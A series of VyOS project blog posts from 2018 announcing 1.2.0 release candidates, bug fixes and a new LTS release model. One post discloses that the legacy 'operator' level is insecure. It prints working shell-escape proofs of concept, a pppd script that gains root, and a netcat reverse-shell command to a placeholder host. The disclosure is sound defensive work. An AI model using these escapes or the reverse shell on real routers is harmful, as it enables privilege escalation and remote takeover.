blog.vyos.net

VyOS 1.2.0-rc10 is available for download

2018-12-04T15:42:58Z

VyOS 1.2.0-rc10 is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc10

Resolved issues

The following issues have been fixed:

If you save your configuration on a system booted from a livecd, you will be offered to copy it to the installed image (T1047).
EFI GRUB can now be installed in a removable location (T1023).
The "run show vpn ipsec sa" command now works correctly for SAs with non-zero traffic counters (T956).
IPsec SA in/out traffic counters are not displayed in human-readable units (T956).

Issues that need testing

We have a bunch of issues that need testing. Please tell us if the following features work for you, or help us figure out a reproducing procedure! We need to make sure they are resolved before we make a stable 1.2.0 release, but we are either unable to reproduce them because they are hardware-specific and we don't have required hardware anywhere; or we cannot reproduce them using the provided procedure, which may mean either that the procedure is incomplete, or that the bug is already fixed.

Kernel crashed under (network) load with gen5 Mellanox cards (T1014).
Broken 6rd tunnel implementation (T1000).
Problem with Intel XL710 NICs (T961).
L2TPv3 interfaces sometimes not loaded on boot (T942).
OSPF process crashing on peer reboot (T922).
BGP process doesn't start on boot (T904).

Additionally, we would like to know if DMVPN and SNMP integration with routing protocols are working well for you. If you've seen any of those issues, or, to the contrary, you can confirm that you've never seen them, please let us know.

VyOS 1.2.0-rc9 is available for download

2018-11-26T20:40:14Z

We are getting closer and closer to the stable release. There are still bugs for a couple more release candidates, and some features we need to get in, but generally the time of spectatular updates in the 1.2.0/crux branch is almost over—all big things will be going on in the new 1.3.0/equuleus branch soon. The new release candidate is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc9

Software updates

The kernel has been updated to the most recent 4.19.4 release. It includes multiple fixes in drivers, so tasks related to drivers like this one about Mellanox card causing a crash under load (T1014), or those about Intel cards (T986, T961) should be re-tested.

This kernel also removes the original SPECTRE vulnerability mitigation code that had a big performance impact. We'd like to hear about your experience in this regard.

We have also included the Hyper-V daemons package. If you are running VyOS on a Hyper-V host, please let us know if it works well for you.

As usual, FRR has been updated to the latest master as well.

Bugfixes

The "protocols bgp ... address-family ipv4-unicast redistribute ospf" works again (T1034).
Set-time validation rules for OSPFv3 areas does not allow decimal notation anymore, since it was never allowed by Quagga or FRR (T981).
PPPoE server help strings and autocompletion have been improved.
The ofed-scripts package (a remnant of the official Mellanox drivers) is removed from the image since we are using kernel built-in drivers now.
Package lists for the image build now correctly include aptitude which is needed for the grub-efi package fetching, so you should be able to build images yourself without problems again. Sorry it's been broken for a while!

Contributor subscriptions

Since the moment we've published the pre-registration form, we have received a number of LTS subscription requests from our veteran contributors, and people who have joined VyOS recently. We are still working on the subscriber portal, but we'll make sure to send everyone a notification when the 1.2.0 LTS release, and the portal are ready. When the portal is ready, contributors will be able to register directly.

If you have been or are contributing to VyOS, you can find the form here.

Upd

Originally the image was accidentally uploaded with broken wireguard package, but the issue is resolved now, thanks to Kroy who identified the issue and notified us quickly.

VyOS release model change

2018-11-23T03:59:22Z

Now that we are approaching the 1.2.0 LTS release, it's time to make a big announcement. Perhaps we should have made it earlier, but we've been too busy coding.

There are two distinct categories of VyOS users. The first category is people who want the latest features even at cost of stability. These are mostly networking geeks who run it in their home networks and network labs and open source developers, though some businesses are also happy with this approach. The second category is people who need or want stability. There are of course people who want both too, but we have to accept that these goals are contradictory at least some of the time.

This is common for all software projects, but with VyOS, more people seem to belong to the second category. Every once in a while someone asks on the channels and the forum whether they can update an extremely outdated VyOS (or even Vyatta Core) version to the latest release. We also hear from people frequently that they are not going to even try 1.2.0 until it reaches the stable status.

It's quite obvious by now that the single release model is not fitting for this situation. With 1.2.0, people who contributed new features had to wait a long time for their code to appear in any non-nightly build image because other people, mainly the maintainers, have been working on tearing the codebase off of the outdated Debian release, reworking the foundations, and hunting bugs. This is frustrating for contributors and even created the appearance of the dead project at some point. It also means that new code doesn't get to people enthusiastic to test it nearly as fast as it should.

On the other hand, while we have an active community of people who send us patches and report bugs, the community is very small compared to the entire user base. The number of people who contributed patches is easy to measure so I did it out of curiosity: the largest submodule, vyatta-cfg-system, has less then 50 unique names in its commit log starting from the project start date, which means less than 50 people contributed to it in five years. The number of active testers isn't much higher. For comparison, the 1.1.8 images get thousands of downloads every month and the wiki documentation gets thousands of views too. To make it easier for people to contribute, there's a lot of work to be done: reworking the foundational libraries, getting rid of poorly written legacy code, and so on, and focused effort (which means human-hours) is required to break the cycle.

Maintaining stable releases is one of the hardest parts, but that burden falls on a disproportionately small number of people, while most of the business users who are the main consumers of stable releases do nothing to advance the project. This is not a healthy or sustainable situation. Someone needs to pay the bills.

The new release model

First, there now will be two release lines: rolling release and long-term support releases.

The rolling release images will be (roughly) monthly snapshots of the "current" branch, with all latest pull requests merged in. They will be tested to successfully boot and load a sample config. The target audience is the people who want the latest features (even if they are not working perfectly yet). People who send us pull requests can be sure their contribution will be available to themselves and willing testers in a reasonable time. Since in VyOS it's easy to revert to the previous version if something goes wrong, the rolling release should be good enough for non-critical production use, since you can always go back to a working version at the end of the maintenance window and report the findings.

The long-term support versions will be maintained for at least two years from the release date. They will undergo extensive testing by the maintainers, and receive backported bugfixes and security updates until they reach an EOL, with a possibility of receiving extended support by special agreement. It is meant for enterprises and service provider users.

Unlike the rolling release images, binary LTS images will be only available to people who help the project move forward, either by contributing their time or their money. We are not going to compromise the free software ideals: you will always be able to build LTS releases yourself.

The LTS images will be available at no cost to all people who contribute to VyOS. Every kind of contribution counts:

Writing code
Testing release candidates and rolling/nightly build and reporting bugs
Writing documentation
Promoting VyOS in blogs, social networks, and at conferences
Everyone who contributed before the release of 1.2.0 LTS version will get a perpetual subscription. People who will have joined later will need to be active within the last year to maintain their subscription (the required activity level is yet to be determined, but it will require substantial and non-trivial changes, i.e. not just typo fixes). Companies who allow their employees to work on VyOS during working hours or specifically pay their employees or contractors to work on code that is meant for the mainline VyOS or produces open source integration tools will be able to get a corporate subscription if those employees/contractors confirm it.

We are also happy to provide subscriptions to contributors of all projects that VyOS uses, such as FRR, netfilter, OpenVPN, StrongSWAN, and many others.

Companies who simply want to use stable, long-term support releases without making technical or social contributions to the project will have to purchase a binary image subscription (you pay for access to ready-made images, not software licensing as such).

All money received from the paid subscriptions will be used to fund VyOS development, including paying the salaries of the VyOS maintainers who work at Sentrium, hiring/contracting developers from the community, expanding the project infrastructure, and supporting our upstream projects.

If you have contributed to VyOS, you can register right now using this form. We will post the details of the commercial offer and pricing later, stay tuned.

P.S.

Back in 2013, I said that there will never be a "VyOS Subscription Edition". Technically I lied, but it was said from a very different perspective. At the time we hoped that now that VyOS is open for everyone's contribution, a large contributor community will form and many of the corporate users who used to use the old project will contribute to it willingly, sponsor its development, or purchase support subscriptions; in practice very few of them did. That approach didn't work, but switching our AWS Marketplace offer from free of charge to paid has become the first reliable funding source for the project and already allowed us to add support for more cloud platforms, as well as rework some of the fundamentals of VyOS to make it easier to contribute to.
I hope continuing this line and introducing the rolling release will create a model that is more beneficial for the project and more fair towards its contributors.
Just to clarify, VyOS is neither going to hide the toolchain required to build LTS releases yourself nor going open core. Those part of the original plan do and will stay the same.

VyOS 1.2.0-rc8 is available for download

2018-11-19T21:29:05Z

A new release candidate, 1.2.0-rc8 is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc8

As usual, it offers a few bugfixes, but also some last moment additions we wanted to make before the code freeze.

New features

PPPoE based on accel-ppp

https://accel-ppp.org/ is a high performance implementation of the PPP protocol itself and multiple protocols based on it, including PPPoE, PPTP, and L2TP that has become very popular with service providers.

To make VyOS a better option for access concentrators, we (and by "we" I mostly mean our contributor hagbard!) rewrote the PPPoE scripts to use accel-ppp instead of rp-pppoe.

No other protocols are reimplemented yet, but we are considering that option. Reimplementing PPTP can be challenging because the kernel module that accel-ppp uses for it conflicts with ip_gre (which is used for normal GRE tunnels as well as PPTP in the current implementation), but L2TPv2 should be doable.

The configuration syntax of the new PPPoE implementation is fully compatible with the old one, save for the RADIUS key option that is handled by a migration script, so your old configuration should work as expected if you used PPPoE server in older releases.

Saltstack integration

This project has existed for quite a while, and even accidentally made it to one of the earlier release candidates, but we never made it official. Now it should be stable enough to be included in an image.

Salt is a popular configuration management project. There is already VyOS support in Ansible, so why not expand our support for automation platforms?

Unlike Ansible, Salt needs an agent package on the target system. The minimal configuration required to make it work is "set service salt-minion master 192.0.2.1" (where 192.0.2.1 is the Salt master server address).

Hop limit matching in IPv6 firewalls

Thanks to a patch by Ray Patrick Soucy, it's now possible to match on hop limit in IPv6 firewall rules (T573).

The command is "set firewall ipv6-name Foo rule 10 hop-limit" and can have one of the following options: "eq $num" (equals exactly), "gt $num" (greater than) and "lt $num" (less than).

BGP interface option for link-local peer sessions

It is now possible to specify the interface to be used for a session in BGP (T941) with a command "set protocols bgp 64512 neighbor 192.0.2.10 interface eth0". This should allow using IPv6 link-local addresses for peer sessions.

Multipath routing options

New kernel versions include a few improvements in multipath routing. By default, the kernel only uses network layer information to bind connections to next hops, but now it's possible to make it also use transport layer information (e.g. TCP or UDP ports) for that decision with these commands: "set system ip multipath layer4-hashing", "set system ipv6 multipath layer4-hashing" (T992).

There's another command that is (so far at least) IPv4-specific: "set system ip multipath ignore-unreachable-nexthops". It makes the kernel exclude next hops with unreachable ARP from routing decisions.

Bug fixes

Obsolete "dynamic" option was removed from NTP (T1018).
It is now possible to restart the DHCP relay agent (T1016).
Conntrack helper is now enabled by default (T1011).
Validation rules for 6rd tunnels have been corrected, now it should be borderline usable (T1000).
Fixed dynamic DNS requests over HTTP (T983).
Fixed DNS forwarding service not listening on IPv6 address (T974).
immark module is now enabled in syslog (T940).
Console device speed option should now modify the GRUB config correctly (T969).
Is it now possible to disable the in-memory table netflow plugin (T458).
OSPF LS update sending on a flapped interface seems to have been automatically solved by migration to FRR (T409).

Bug that need verification

Some people reportes that Intel XL710 network cards do not work, but that was before we updated the kernel to 4.19 (T961). It needs re-testing on rc7 or rc8.

This kernel also needs more testing with fifth generation Mellanox cards.

VyOS 1.2.0-rc7 is available for download

2018-11-12T20:24:31Z

Yet another release candidate, with more bug fixes and some experimental features. We are grateful to everyone who reported these bugs and sent us patches for them!

The ISO image is available for download here

New features

RADIUS client source IP in remote access VPN

It is now possible to set the source IP with a command like "set vpn l2tp remote-access authentication radius source-address 192.0.2.10".

UEFI support

Thanks to joined efforts of our contributor Kroy the Rabbit and the maintainers, VyOS has got experimental support for installation and boot on UEFI platforms.

Since UEFI-only boxes started to enter the market lately, it makes a perfect last moment addition, but as any big change, it needs testing. If you have hardware that uses UEFI, please try it out and let us know if it works well for you.

If your machine is using UEFI boot, the installer will detect it automatically and create a GPT partition table and an UEFI partition rather than MBR, so for the users this new feature should be seemless.

Bug fixes

Updates to the latest kernel and the latest FRR seem to have resolved a number of tasks automatically, namely: an issue with route-map interface close not working for all protocols (T524), packet loss in some Xen environments including AWS (T935), support for the Denverton SoC (T946).

Fixes in BGP commands

Thanks to our community, we have identified a few more BGP commands whose migration to the new "address-family ipv4-unicast" syntax was incomplete. IPv4 prefix lists should now work correctly (T968), and so should "soft-reconfiguration inbound" (T982).

FRR syntax changes

While FRR has brought us a lot of improvements, it also has a small number of incompatibilities.

A syntax change in the "as-path-exclude" route-map option made it impossible to delete the clause or entire route-map, until we fixed it (T991).

Another change is only planned, but already has deprecation warnings that are quite annoying (T964). We have fixed most of them, except in the "policy community-list" commands. The final bit is blocked by an issue in the new FRR commands that are supposed to replace the old ones, so until it's fixed you will get a warning when deleting or modifying community-lists. The warning is harmless, and we will fix it and also update op mode commands once the FRR developers fix their part.

Wireguard

A couple of issues with the wireguard CLI have been fixed. One was that you could not use whitespace inside wireguard interface descriptions (T979). The other issues would leave the VyOS CLI and the actual wireguard configuration in an incosistent state (T965). Thanks to our contributor hagbard, the issues have been resolved.

Misc

Removing a user with a "delete system login user" command now correctly deletes home directories, eliminating the possibility that the same home directory can be reassigned to a new user with a different UID and thus no write permissions for the original directory (T740).

Authentication/authorization logs should now work as expected again (T963).

The installer now allows installation on NVM Express SSD devices /dev/nvme* (T967). The patch was contributed by Brooks Swinnerton.

The "run monitor bandwidth-test initiate" command works again (T994).

The "| strip-private" pipe now correctly obscures "pre-shared-secret" options (T999).

The "hostfile-update" DHCP server option should now work again (T976).

VyOS 1.2.0-rc6 is available for download

2018-11-06T23:54:41Z

As usual, every week we make a new release candidate so that people interested in testing can test the changes quickly and people who reported bugs can confirm they are resolved or report further issues.

VyOS 1.2.0-rc6 is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc6

It includes a small but significant number of bugfixes and a couple of removed commands.

Package updates

VyOS 1.2.0-rc6 uses the Linux kernel 4.19.0. The 4.19 kernel will be the next LTS version, it should be a good kernel to stick with for the lifetime of the 1.2.0 release.

The 4.18 kernel was quite buggy, and 4.14.75 had annoying bugs with small packets causing packet loss in Xen that was solved in later versions.

This image also uses built-in drivers for Mellanox cards rather than those built from the official tarball, since they do not build for newer kernels yet. If you are using one of their fifth generation cards, let us know if it works for you.

Wireguard issues

Issues with creating multiple wireguard interfaces (T949) and with wireguard interfaces disappearing after reboot (T943) have been resolved.

Issues with removing long format IPv6 addresses from interfaces

It was always possible to use long format of IPv6 addresses, with leading zeroes, like 2001:db8:0:0:0:0:0:1/64 (T288), but it was impossible to delete them without rebooting the router because iproute2 does compacts addresses at set time and doesn't recognize the short and long forms as the same address. We've added a workaround for it and it should no longer be a problem.

Import route-map not set for IPv4 BGP peer groups

There was an issue with setting import route-map for IPv4 peer groups (T924). I have to admit I simply forgot to convert one of the commands to the new "address-family ipv4-unicast" syntax, so the path existed in the CLI, but was never passed to FRR correctly. Now it should work as expected.

New command for checking VyOS installation integrity

If you, like me, can never remember if you are running a stock image or a modified installation, this is for you.

dmbaturin@vyos:~$ show system-integrity 
The following packages don't fit the image creation time:
build time:     2018-11-06 01:28:00
installed: 2018-11-06 01:44:28  vyos-1x

It only shows is any packages were installed on top of the image, and not whether any files were modified, but that's better than nothing.

Removed commands

The "run show vpn debug detail" operational mode command was removed because it was based on a script that StrongSWAN no longer provides, and reimplementing it is probably more trouble than it's worth since it just aggregates information already available in the logs and output of other commands.

We have also removed the "set service dhcp-relay relay-options port" command. The DHCP RFC nowhere says that servers or relays MAY use a port other than UDP/67, and almost no clients support alternative ports either, so this option hardly has any practical value. If you used to use it, it will disappear from your config. If you actually need it, please tell us about your use case.

The "operator" level is proved insecure and will be removed in the next releases

2018-11-01T19:37:42Z

The operator level in VyOS is a legacy feature that was inherited from the forked Vyatta Core code. It was always relatively obscure, and I don't think anyone really trusted its security, and for good reasons: with our current CLI architecture, real privilege separation is impossible.

Security researcher Rich Mirch found multiple ways to escape the restricted shell and execute commands with root permissions for the operator level users. Most of those would take a lot of effort to fix, and it's not clear if some of those can be fixed at all. Since any new implementation of a privilege separation system will be incompatible with the old one, and leaving operator level in the system is best described as "security theater", in the next releases that feature will be removed and operator level users will be converted to admin level users.

We will use the "id" UNIX command for demonstration since it's harmless but is not supposed to be available for operator level users. Here are proofs of concept for all vulnerabilities reported by Rich:

Restricted shell escape using the telnet command

Proof of concept:

user1@vyos> telnet "127.0.0.1;bash"
telnet: can't connect to remote host (127.0.0.1): Connection refused
# we are now in real, unrestricted bash

user1@vyos> id
uid=1001(user1) gid=100(users) groups=100(users),...

This problem could potentially be fixed, but since there's no way to introduce global input sanitation, every command would have to be checked and protected individually.

Restricted shell escape using the "monitor command" command

The "monitor command" command allows operator level users to execute any command. Using it in combination with netcat it's possible to launch an unrestricted bash shell:

user1@vyos> monitor command "$(netcat -e /bin/bash 192.168.x.x 9003)"

Connection from 192.168.x.x:59952
id
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)
hostname
vyos

Restricted shell escape using the traffic dump filters

user1@vyos> monitor interfaces ethernet eth0 traffic detail unlimited filter "-w /dev/null 2>/dev/null & bash"
Capturing traffic on eth0 ...

id
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

Restricted shell escape using backtick evaluation as a set command argument

user1@vyos> set "`/bin/bash`"

user1@vyos> id >/dev/tty
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)

This one is special because there may not be a way to fix it at all.

Local privilege escalarion using pppd connection scripts

Operator level users are allowed to call pppd for the connect/disconnect commands. Since pppd is executed with root permissions, a malicious operator can execute arbitrary commands as root using a custom PPP connection script.

user1@vyos> echo "id >/dev/tty" > id.sh
user1@vyos> chmod 755 id.sh

Execute the id command as root using the sudo /sbin/pppd command.

user1@vyos> sudo /sbin/pppd connect $PWD/id.sh
uid=0(root) gid=0(root) groups=0(root)

VyOS 1.2.0-rc5 is available for download

2018-10-29T17:50:49Z

As the tradition dictates, the new weekly release candidate is available for download

Package updates

The following packages have been updated:

Linux kernel to 4.14.75
Mellanox network drivers to 4.4

Bug fixes

SNMP integration with routing protocols

The last bit configuration that is required for it to work is in now, and it should work as expected again. If it doesn't work for you, let us know!

VRRP not working in unicast mode when the RFC-compatible mode is selected

In T933 it was reported that if you configure VRRP in unicast mode and choose to use virtual MACs (RFC compatible mode), both nodes become masters. Now the config option required for this to work is inserted into keepalived config.

DHCP relay now handles the port option correctly

As reported in T938, DHCP relay would not handle the port option correctly. Now it does.

Tag nodes with whitespace

As reported in T253, it was possible to create a tag node with whitespace in its name (e.g. "set system login user "foo bar" authentication..."), but such configs would not be parsed correctly if you try to load them back.

In most cases attempts to create such nodes should be blocked at the syntax validation level, but since old configs with such nodes may exist, and it is impossible to disallow doing that completely at the set command level, we've added support for quoting such nodes properly in the code responsible for displaying and saving configs. Now such configs will load at least partially and produce more descriptive errors when disallowed by individual command syntax.

Commit archive problem with edit levels

As reported in T570, changing the edit level caused the commit archive feature to save only the config at that level to the remote server, for example, if you did "edit interfaces", the archived config would contain nothing but the interfaces subtree.

It was caused by erroneous omission of the option that makes cli-shell-api output the entire config regardless of the edit level and should be fixed now.

The "run monitor traffic interface ... filter" commands now has full support for tcpdump filters

As reported in T931, commands like "run monitor traffic interface eth0 filter ''src 192.0.2.1 or dst 203.0.113.10" would fail. Now the simple mistake that caused it is fixed and such commands should work again.

Compatibility notes

Username restrictions

Related to the whitespace issue, some commands had overly permissive syntax. The "system login user" username format has been restricted to the POSIX portable characters and length below 100 now (that's alphanumeric characters, underscores, hyphens, and dots). If usernames do not conform to the undeniably portable format (alphanumeric and underscores/hyphens only), you will receive a warning.

There may be old configs with unusual usernames, and they now may fail to load. If you run into issues with that restrictions, let us know.

The "inspect" action in firewall rules no longer exists

The "inspect" action was once used for the IPS/IDS functionality, but the IDS (it was Snort) was removed long before VyOS was forked from Vyatta. The now useless action, however, persisted.

Now we have removed it. We think the chance to see it in a real config is very low, and this should have no impact, but if you run into problems, leave a note in T59, and we'll make a migration script.

In other news

The 1.2.0/Crux repositories are now fully separated from the "current" branch repositories, in preparation for the LTS release. This reopens the "current" branch for experimental and potentially unsafe changes so that we can start working on new big rewrites, migration to newer Debian and other things required for the future 1.3.0 release.

VyOS 1.2.0-rc4 is available for download

2018-10-25T14:18:45Z

VyOS 1.2.0-rc4 release candidate is available for download from here

The release includes multiple bug fixes and a few small features.

You can view the complete changelog here.

Here are some highlights:

Bugfix: SNMP and routing protocols

Due to a change in FRR compared to our old Quagga, SNMP support for routing protocols had been broken for a while. Now it should work again.

Bugfix: BGP community lists

Due to another change in FRR, we've had an annoying bug that made it impossible to edit BGP community list rules after creation (T799).

For now it was fixed using a dirty hack that may slow down community list editing operations somewhat, and the root cause was reported to FRR maintainers. Once they fix it, we can remove the hack easily.

Feature: BGP extended community lists

Support for extended community lists was supposed to be there for a long time, but in reality the commands were broken (T64).
The bug in community lists editing helped us discover that issue, and the commands were fixed.

Here is an example of that feature's syntax:

# show policy extcommunity-list ExctcommunityExample 
 rule 10 {
     action permit
     regex 100000:999
 }
 rule 30 {
     action deny
     regex ^$
 }
[edit]
# show policy route-map ExtcommunityExample 
 rule 10 {
     action permit
     match {
         extcommunity ExctcommunityExample
     }
 }

Please test is and tell us if it works fine for you.

SSH allow-root option

The "service ssh allow-root" is no longer supported. It will be automatically removed from configs first time the upgrade image boots.

It's a common wisdom that logging in as root is not a good idea. We believe this change is going to have a very limited impact at best. One objection was that automation tools may need it, but all modern tools such as ansible are capable of elevating privileges properly with sudo.

However, if your automation setup is using it, please take it into account. You still have time to do it before 1.2.0 LTS is released.

New drivers and utilities

VyOS now includes updated firmware packages, in particular, new firmware for Broadcom cards that were reported not to work in T708.

The image also includes a few popular diagnostic tools by default, such as htop, atop, and iotop.

VyOS 1.2.0-rc3 is available for download, with BGP large communities and new bugfixes

2018-10-15T14:18:56Z

VyOS 1.2.0-rc3 release candidate is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc3

Thanks to all people testing release candidates, more bugs were uncovered and fixed. But this release also includes a new feature, that was made possible by migration away from our outdated Quagga, namely:

BGP large communities

Since we are using FRR rather than an outdated Quagga version now, we could finally add CLI support for a long requested feature: large communities. Now that RIRs are out of 32-bit AS numbers, it's more relevant than ever.

The syntax is very simple and similar to that of community-lists:

set policy large-community-list Foo rule 10 action permit
set policy large-community-list Foo rule 10 regex 4000000:33333:4444
set policy large-community-list Foo rule 20 action deny
set policy large-community-list Foo rule 20 regex '^$'

set policy route-map Bar rule 10 action permit
set policy route-map Bar rule 10 match large-community large-community-list Foo

set policy route-map Quux rule 10 action permit
set policy route-map Quux rule 10 set large-community 90000:555:111

Note that there are no well-known communities such as "no-export" here, unlike in the classic communities. I also decided not to implement support for "standard" (numbered) large-community-lists and only include "expanded" (named) lists.

Now to the bug fixes.

Directly connected interface-routes

Some hosting providers, for example, Online.net, use an unusual configuration with /32 host addresses, where you are supposed to create an interface-based route to the default gateway address and then create a default route via that address.

While this configuration is against the classic networking common sense, and I'm not a fan of it, it's technically perfectly valid and increasingly common. The Linux kernel network stack uses a "you asked for it, you get it" approach and allows you to do any crazy things, which sometimes turn out surprisingly useful. Our old Quagga, however, would treat such routes as unreachable because the next hop address is not from the same network as assigned on the interface — sound reasoning, but in this situation it was wrong.

The only way to make it work was to add an iproute2 command to the postconfig script, which is cumbesome. Migration to FRR seems to have resolved that issue though. This configuration appears to work fine in my lab:

set interfaces ethernet eth1 address 192.0.0.2.10/32
set protocols static interface-route 203.0.113.1/32 next-hop-interface eth1
set protocols static route 0.0.0.0/0 next-hop 203.0.113.1

This is what the route table looks like: the 203.0.113.1/32 route is treated as directly connected.

vyos@vyos# run show ip route
...
S>  0.0.0.0/0 [1/0] via 203.0.113.1 (recursive), 00:00:03
  *                   via 203.0.113.1, eth1 onlink, 00:00:03
C>* 192.0.2.10/32 is directly connected, eth1, 00:00:03
S>* 203.0.113.1/32 [1/0] is directly connected, eth1, 00:00:03

And this is what it looks like in the kernel:

vyos@vyos# run show ip route forward 
default via 203.0.113.1 dev eth1 proto static metric 20 onlink 
192.168.56.0/24 dev eth0 proto kernel scope link src 192.168.56.13 
203.0.113.1 dev eth1 proto static metric 20

If you are using online.net or another hosting provider that uses this scheme, please test it and tell us if it works for you without workarounds.

Fixes in bridging and tunnels

Thanks to Kroy from the forum, we tracked down and fixed a few bridging bugs that had been there for a long time but no one noticed.

The first bug was that the system allowed you to remove a bridge that still has active members (T898). Even with that bug fixed, you still could not remove a tunnel interface from a bridge because its own script was faulty (T900).

Both are now fixed, but there are still issues in that script: STP cost and priority options are not functional. We may fix it in the next release candidate.

Additionally, OpenVPN interfaces could not be added to bridges due to a brctl syntax change, as reported by afics in T884. This should also be fixed now.

Image signature check failure confirmation

Armin Fisslthaler (afics) noticed a particularly embarassing bug: when the installer fails to verify image GPG signature (due to missing key or otherwise), it asks if you want to proceed, and suggests that the default option is "No", but if you just hit Enter, it proceeds instead of exiting (T885).

Ewald van Geffen took the time to fix that conditional and now it should no longer haunt us.

Missing release key in the image

Speaking of which, the VyOS release key is now included in the image and signature check should no longer fail.

More fixes

Corrected the syntax for deleting IPv6 next-hop (T800, fix suggested by Merjin).

IPv6 next-hop local value is now validated at set rather than commit time (T897).

Known issues

VyOS 1.2.0-rc2 is available for download, with fixes to wireguard and PBR

2018-10-09T19:15:42Z

The second release candiate is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc2

We are happy to see so many people test the release candidates! Some bugs were already found and fixed, and we are working on some more bugs found since the release of 1.2.0-rc1. To make already completed fixed available, we are making the second release candidate.

Resolved issues

Wireguard module not loading (T881).
PBR routes leaking into other tables (T882).
Unhandled exception in the wireguard op mode (T883).

Known issues

Fail to add an OpenVPN to a bridge group if cost is not specified (T884, let us know if you also see it).
commit-confirm doesn't cancel reboot properly (T870).
The GPG key for release builds is not included in the image

Stay tuned for the rc3!

First VyOS 1.2.0 release candidate is available for download

2018-10-08T16:49:00Z

This month, the VyOS project turns five years old. In these five years, VyOS has been through highs and lows, up to speculation that the project is dead. Past year has been full of good focused work by the core team and community contributors, but the only way to make use of that work was to use nightly builds, and nightly builds are like a ~~chocolate box~~ a box of WWI era shells—you never know if it blows up when handled or not. Now the codebase has stabilized, and we are ready to present a release candidate. While it has some rough edges, a number of people, including us, are already using recent builds of VyOS 1.2.0 in production, and now it's time to make it public.

VyOS 1.2.0-rc1 is available for download from https://downloads.vyos.io/?dir=testing/1.2.0-rc1

VyOS 1.2.0 (Crux) is the feature expansion release based on Debian Jessie. The release candidate will be the basis for the future long term support release. You can read the full release notes at https://wiki.vyos.net/wiki/1.2.0/release_notes

New features include:

Wireguard support
PPPoE server
mDNS repeater and broadcast relay
Support for IPv6 VRRP and unicast VRRP operation
NPTv6
Standards-compliant QinQ ethertype option
Python APIs for accessing the running config and writing migration scripts (replacements of the Perl Vyatta::Config and XorpConfigParser)
New XML-based command definitions
New build system that makes it easy to create custom builds with additional repositories and packages
SR-IOV support for Intel and Mellanox cards

The following features have been removed:

Telnet server
p2p filtering

While the base system if Debian Jessie, multiple packages have been updated to much newer versions, for example, the 4.14.65 kernel, StrongSWAN 5.6, and keepalived 2.0.5.

Additionally, our old Quagga has been replaced with FRR, which opens a way to adding support for many more protocols, including multicast routing.

Known issues

Some people reported issues with DMVPN in hub mode (T848).

Some people report an issue with routers responding to all ARP requests when VTI is enabled (T852).

If you use DMVPN or VTI, you may either help with testing and debugging those issues, or wait until the issues are confirmed to be resolved.

What's next

VyOS 1.2.0 will become the LTS release after one or more release candidates.

We are preparing a release model change that will involve splitting VyOS into an LTS branch a (roughly) monthly rolling release made from the latest code from the current branch. Both branches will be entirely open source, but while the rolling release builds will be available free of charge to everyone, the LTS ISO image builds will be only available to those who either contribute to VyOS (code, documentation, and community activities all count) or purchase a subscription. There will always be an option to build the LTS image entirely from source or using package repositories at dev.packages.vyos.net, though commercial support will only be provided for official builds, or by special arrangement.

We are also working on new commercial support plans and pricing models.

The current branch will now be used for developing 1.3.0. Top priorities for 1.3.0 include migration to the next Debian release and rewriting more legacy code to enable better testing and easier addition of new features.

In a sense, VyOS 1.2.0 was a test whether the project can exist independently or not. While 1.1.x was an incremental expansion of the last Vyatta Core release, development of 1.2.0 coincided with mainstream Linux distributions switching to systemd, many packages such as StrongSWAN making big incompatible changes, and parts of VyOS itself reaching the point when bugs could no longer be fixed without a complete rewrite. The build system also had to be rewritten from scratch.

A lot of work went into developing the new infrastructure for Python rewrites, including the new system of command definitions and required libraries. By now a a few components including SSH, SNMP, cron, and DNS forwarding have been rewritten in the new way, and the rewrite movement is gaining momentum.

Let's test and polish the 1.2.0 release, and keep working on making VyOS a better, more easily maintainable platform in the future 1.3.0 release.

VyOS development news in August and September

2018-09-16T18:39:00Z

Most importantly: all but one blockers for the 1.2.0 release candidate are now resolved. Quite obviously, for the release candidate, we want all features that worked in 1.1.8 to work fully.

New release naming scheme

While we are at it, I'd like to announce a small cosmetic change. Until now, our release branches were named after chemical elements. This naming scheme is getting a bit too common though (OpenDayLight is a well known example, but there are more), we decided to change it to something else to avoid confusion and be a bit more original.

The new branch theme is constellations sorted by area (in square degrees), from the smallest to the largest. The 1.2.0 release will be named Crux. Crux, also known as the Southern Cross, is a small but bright and iconic constellation that is depicted on flags of many countries of the southern hemisphere, such as Australia and New Zealand.

The 1.3.0 release will be named Equuleus, which is the latin for little horse (no relation to My Little Pony).

Migration to FRR from Quagga

We have resolved most of the migration problems and latest nightly builds already use FRR instead of our aged Quagga.

It will open a path to implementing many new protocols and features, such as BFD, PIM-SM, and more. What kept us from migrating was lack of support for multiple routing tables, which we need for PBR. FRR added it recently, and by now the last known issue that blocked migration (routes from the default table unintentionally leaking into non-default tables) has been resolved, so we finally can migrate without losing any features.

While I do feel somewhat uneasy about licensing of certain daemons, that are included in the source tree but use a permissive open source license even though they are linked against GPL libraries, we do not believe there's a GPL violation in it as long as the license of the binary package is GPL. Not sharing a modified source code of those daemons with users of the binary package would be a GPL violation, but we keep all source code of every VyOS component public.

New BGP address-family syntax

This is still in the works, but it will make it to the nightly builds soon.

Originally, VyOS used to have IPv6-specific BGP options under "address-family ipv6-unicast", but IPv4 options were directly under neighbor. The historical reason is that originally IPv6 BGP was not supported at all. This syntax was rather inconsistent, and made it hard to quickly see which options are address family specific. We used to stick with that inconsistent syntax just because it was always done that way.

One behaviour change in FRR made us reconsider that. As you may know, in BGP, routing information exchange is completely orthogonal to the session transport: IPv4 routes can be exchanged over a TCP connection established between IPv4 addresses and vice versa. The default behaviour of most, if not all, BGP implementation is to enable both address families regardless of the session transport.

That behaviour can be changed by an option, in VyOS, that's "set protocols bgp ... parameters default no-ipv4-unicast". The old behaviour of Quagga was to apply that only to sessions whose transport is IPv6, which is just as inconsistent. FRR takes that option literally and disabled IPv4 route advertisments for all peers if it's active, unless peers are explicitly activated for the IPv4 address family.

